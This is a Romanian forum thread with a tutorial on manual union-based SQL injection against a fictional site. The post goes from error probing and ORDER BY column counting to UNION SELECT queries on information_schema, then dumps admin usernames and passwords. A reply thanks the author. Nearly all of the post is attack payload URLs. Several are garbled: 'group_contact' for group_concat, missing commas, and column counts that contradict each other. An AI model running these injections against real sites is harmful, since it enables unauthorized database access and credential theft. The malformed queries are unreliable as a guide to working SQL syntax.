Jump to content
mDOS

SQL Injection-Manual

Recommended Posts

Sa zicem ca aveti un site din programul "Big Bounty" si vreti sa incercati un atac MYSQL.

Eu am sa pun urmatorul site fictional:

https://victimescu.com/index.php?id=5

 

Pentru a verifica daca site-ul nostru da o eroare Sql trebuie sa punem dupa parametrul .php?.id=5 semnul (').

 

Daca acesta este vulnerabil va scrie urmatoarea chestie:

You have an error in your SQL syntax; check the manual that corresponds to your….. Continued

Daca acesta nu este vulnerabil, site-ul nostru va functiona normal.

 

In continuare trebuie sa mergem cu parametrul (ORDER BY ) ca in pasul de mai sus.

- Acesta este folosit pentru a verifica cate coloane se afla pe pagina respectiva in baza de date mySQL.

 

https://victimescu.com/index.php?id=5 ORDER BY 5 -

 

Daca pagina noastra functioneaza perfect normal inseamna ca sunt prezente mai mult de 5 coloane in baza de date.

Incercam sa marim numarul cu 10.

 

https://victimescu.com/index.php?id=1 ORDER BY 15-

 

Sa zicem ca acum ne va aparea eroarea care ne indica numarul de coloane prezente.

 

Unknown column ’10’ in ‘order clause’Unknown column ’10’ in ‘order clause’ 

 

Sa zicem ca pe site-ul nostru fictional avem prezente 9 coloane.

 

Acum continuam doar cu parametrul (UNION SELECT).

 

https://victimescu.com/index.php?id=5 UNION SELECT 1,2,3,4,5,6,7,8,9

 

In continuare trebuie sa apara 2 numere care indica unde facem injectarea.

-------------------------------------------------

Un numar din cele 2 va fi boldit.

-------------------------------------------------

Sa zicem ca cele 2 numere sunt 5 si 3 iar cel care ne indica baza de date sau coloana unde trebuie facuta injectarea este 5.

 

 

https://victimescu.com/index.php?id=5 UNION SELECT 1,2,3,4 group_contact (table_name),6,7 from information_schema.tables

 

Aceasta comanda ne ajuta sa vedem ce se afla in aceasta baza de date.

 

CHARACTER_SETS,CLIENT_STATISTICS,COLUMNS

In continuare pentru a extrage mai multe chestii scriem urmatoarea comanda:

 

 

https://victimescu.com/index.php?id=5 UNION SELECT 1,2,3,4 group_contact (column_name),6,7 from information_schema.columns where table_schema=database()-

 

in continuare o sa ne apara:

-useri

-parole

-email-uri

-etc

 

https://victimescu.com/index.php?id=5 UNION SELECT 1,2,3,4 group_contact(username,0x3a,password),67 from database-

 

Aceasta comanda a fost folosita pentru a afla parola de la panel.

-------------------------------------------------

Deseori parola va fi in format MD5

-------------------------------------------------

 

Acesta a fost tutorialul si sper sa fie folosit in scopuri bune. :)

 

 

 

 

 

  • Upvote 2
Link to comment
Share on other sites

Mamaaa, asta m-a invatat pe mine cineva (tot de aici insa nu mai retin nick-ul) acum 5-6 ani cred :-)) (era pe timpul cu rstcenter...)

Foarte bun tutorial.

 

O sa caut in pc-ul meu ca aveam ceva syntaxe cu sqli, si le postez tot aici.

 

Edited by n3Oh
  • Like 1
  • Thanks 1
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...